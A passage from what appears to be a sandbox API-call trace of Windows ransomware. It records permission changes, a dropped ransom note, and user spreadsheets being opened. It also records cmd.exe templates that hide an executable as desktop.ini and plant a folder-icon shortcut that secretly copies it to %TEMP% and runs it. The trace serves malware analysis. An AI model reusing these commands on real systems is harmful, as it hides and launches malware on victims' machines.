lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xf90, dwThreadId=0xf94)) returned 1 [0126.478] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] CloseHandle (hObject=0x110) returned 1 [0126.945] CloseHandle (hObject=0x114) returned 1 [0126.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.945] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x12eab4*="RacDatabase.sdf") returned 0x3a [0126.945] GetLastError () returned 0x20 [0126.945] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xb810\x1d\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x51 [0126.945] LocalFree (hMem=0x1db810) returned 0x0 [0126.945] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0126.946] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0126.946] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.946] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", cchLength=0x2b | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\") returned 0x2b [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\") returned 0x2f [0126.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\", cchCount1=43, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\", cchCount2=47) returned 3 [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", cchLength=0x2b | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\") returned 0x2b [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0126.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\", cchCount1=43, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0126.946] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0126.947] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0126.947] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0126.947] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\") returned 0x28 [0126.947] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0126.947] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0126.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xfc4, dwThreadId=0xfc8)) returned 1 [0126.949] CloseHandle (hObject=0x110) returned 1 [0126.949] CloseHandle (hObject=0x114) returned 1 [0126.949] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\bl0cked-readme.rtf")) returned 0xffffffff [0126.949] GetLastError () returned 0x2 [0126.949] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0126.953] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\bl0cked-readme.rtf")) returned 0x2020 [0126.953] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0126.953] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1f8790 [0126.953] FindClose (in: hFindFile=0x1f8790 | out: hFindFile=0x1f8790) returned 1 [0126.953] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0126.953] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0126.953] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0126.953] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0126.954] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\") returned 0x28 [0126.954] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0126.954] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0126.954] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1") returned 0x27 [0126.955] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x15a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x15a [0126.955] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0126.955] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xfcc, dwThreadId=0xfd0)) returned 1 [0126.960] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0127.619] CloseHandle (hObject=0x114) returned 1 [0127.619] CloseHandle (hObject=0x110) returned 1 [0127.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.619] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1f8790 [0127.619] FindClose (in: hFindFile=0x1f8790 | out: hFindFile=0x1f8790) returned 1 [0127.619] GetTickCount () returned 0x28f72 [0127.619] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18440828049) returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="M\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="T\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="X\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="L\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="0\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="s\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="p\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="o\x1dﯸ\x12萀\x1d") returned 1 [0127.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.619] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0127.619] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0127.619] CharUpperBuffW (in: lpsz="explorer.exe \"StateData\" & type \"StateData\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x63 | out: lpsz="EXPLORER.EXE \"STATEDATA\" & TYPE \"STATEDATA\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x63 [0127.619] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0127.619] CharUpperBuffW (in: lpsz="explorer.exe \"StateData\" & type \"StateData\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x64 | out: lpsz="EXPLORER.EXE \"STATEDATA\" & TYPE \"STATEDATA\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x64 [0127.619] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0127.619] CoInitialize (pvReserved=0x0) returned 0x0 [0127.620] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0127.621] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0127.621] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0127.621] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0127.622] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"StateData\" & type \"StateData\\desktop.ini\" > \"%TEMP%\\MTXL0spo.exe\" && \"%TEMP%\\MTXL0spo.exe\"") returned 0x0 [0127.622] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0127.622] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0127.622] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0127.623] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData.lnk", fRemember=0) returned 0x0 [0127.629] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0127.629] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0127.629] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0127.629] CoUninitialize () [0127.629] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.629] ReleaseMutex (hMutex=0xf8) returned 1 [0127.629] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.630] ReleaseMutex (hMutex=0xf8) returned 1 [0127.630] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.630] ReleaseMutex (hMutex=0xf8) returned 1 [0127.630] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.630] ReleaseMutex (hMutex=0xf8) returned 1 [0127.630] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\BS0-Nm2046.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bs0-nm2046.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18441917908) returned 1 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 